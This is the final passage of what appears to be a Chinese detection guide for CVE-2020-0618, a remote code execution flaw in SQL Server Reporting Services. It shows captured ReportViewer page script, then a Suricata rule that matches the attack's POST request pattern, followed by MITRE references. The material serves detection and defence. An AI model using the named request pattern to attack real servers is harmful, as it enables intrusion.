$create(ReportingServices.WebFormsClient._AsyncWaitControl, {"ClientCanceledId":"ReportViewerControl_AsyncWait_HiddenCancelField","DisplayDelay":1000,"FixedTableId":"ReportViewerControl_fixedTable","ReportViewerId":"ReportViewerControl","SkipTimer":true,"TriggerIds":["ReportViewerControl"],"WaitControlId":"ReportViewerControl_AsyncWait_Wait"}, null, null, $get("ReportViewerControl_AsyncWait"));
});
Sys.Application.add_init(function() {
$create(ReportingServices.WebFormsClient._Splitter, {"HoverStyle":"SplitterHover","ImageCollapse":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterHorizCollapse.png","ImageCollapseHover":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterHorizCollapseHover.png","ImageExpand":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterHorizExpand.png","ImageExpandHover":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterHorizExpandHover.png","ImageId":"ReportViewerControl_ToggleParam_img","IsCollapsable":true,"NormalStyle":"SplitterNormal","Resizable":false,"StoreCollapseField":"ReportViewerControl_ToggleParam_collapse","StorePositionField":"ReportViewerControl_ToggleParam_store","TooltipCollapse":"............","TooltipExpand":"............","Vertical":false}, null, null, $get("ReportViewerControl_ToggleParam"));
});
Sys.Application.add_init(function() {
$create(ReportingServices.WebFormsClient._Splitter, {"HoverStyle":"SplitterHover","ImageCollapse":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterVertCollapse.png","ImageCollapseHover":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterVertCollapseHover.png","ImageExpand":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterVertExpand.png","ImageExpandHover":"/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource\u0026Version=13.0.1601.5\u0026Name=Microsoft.Reporting.WebForms.Icons.SplitterVertExpandHover.png","ImageId":"ReportViewerControl_ctl07_img","IsCollapsable":true,"NormalStyle":"SplitterNormal","Resizable":true,"StoreCollapseField":"ReportViewerControl_ctl07_collapse","StorePositionField":"ReportViewerControl_ctl07_store","TooltipCollapse":".....................","TooltipExpand":".....................","Vertical":true}, null, null, $get("ReportViewerControl_ctl07"));
});
Sys.Application.add_init(function() {
$create(ReportingServices.WebFormsClient._ReportArea, {"NonReportContentId":"ReportViewerControl_ctl09_NonReportContent","ReportAreaVisibilityStateId":"ReportViewerControl_ctl09_VisibilityState","ReportControlId":"ReportViewerControl_ctl09_ReportControl","ScrollPositionId":"ReportViewerControl_ctl09_ScrollPosition","VisibleReportContentContainerId":"VisibleReportContentReportViewerControl_ctl09"}, null, null, $get("ReportViewerControl_ctl09"));
});
Sys.Application.add_init(function() {
$create(ReportingServices.WebFormsClient._ReportPage, {"HiddenZoomLevelId":"ReportViewerControl_ctl09_ReportControl_ctl04","StyleElementId":"ReportViewerControl_ctl09_ReportControl_styles"}, null, null, $get("ReportViewerControl_ctl09_ReportControl"));
});
//]]>
</script>
</form>
<script language="javascript" type="text/javascript">
Sys.WebForms.PageRequestManager.prototype._destroyTree = function(element) {
var allnodes = element.getElementsByTagName('*'),
length = allnodes.length;
var nodes = new Array(length);
for (var k = 0; k < length; k++) {
nodes[k] = allnodes[k];
}
for (var j = 0, l = nodes.length; j < l; j++) {
var node = nodes[j];
if (node.nodeType === 1) {
if (node.dispose && typeof (node.dispose) === "function") {
node.dispose();
}
else if (node.control && typeof (node.control.dispose) === "function") {
node.control.dispose();
}
var behaviors = node._behaviors;
if (behaviors) {
behaviors = Array.apply(null, behaviors);
for (var k = behaviors.length - 1; k >= 0; k--) {
behaviors[k].dispose();
}
}
}
}
}
</script>
</body>
</html>
检测规则/思路
Suricata规则
alert http any any -> any any (msg:"CVE-2020-0618-Sql-server远程代码执行";flow:established,to_server;content:"POST";http_method;content:"/ReportServer/pages/ReportViewer.aspx";http_uri;content:"NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=";http_client_body;reference:url,www.cnblogs.com/8gman/p/12323273.html;classtype:web-application-attck;sid:3002021;rev:1;)
建议
流量+安全设备比较容易检测到此攻击行为。
参考推荐
MITRE-ATT&CK-T1190
https://attack.mitre.org/techniques/T1190/
CVE-2020-0618 SQL Server远程代码执行
https://www.cnblogs.com/8gman/p/12323273.html
(CVE-2020-0618)sql2012远程代码执行漏洞修复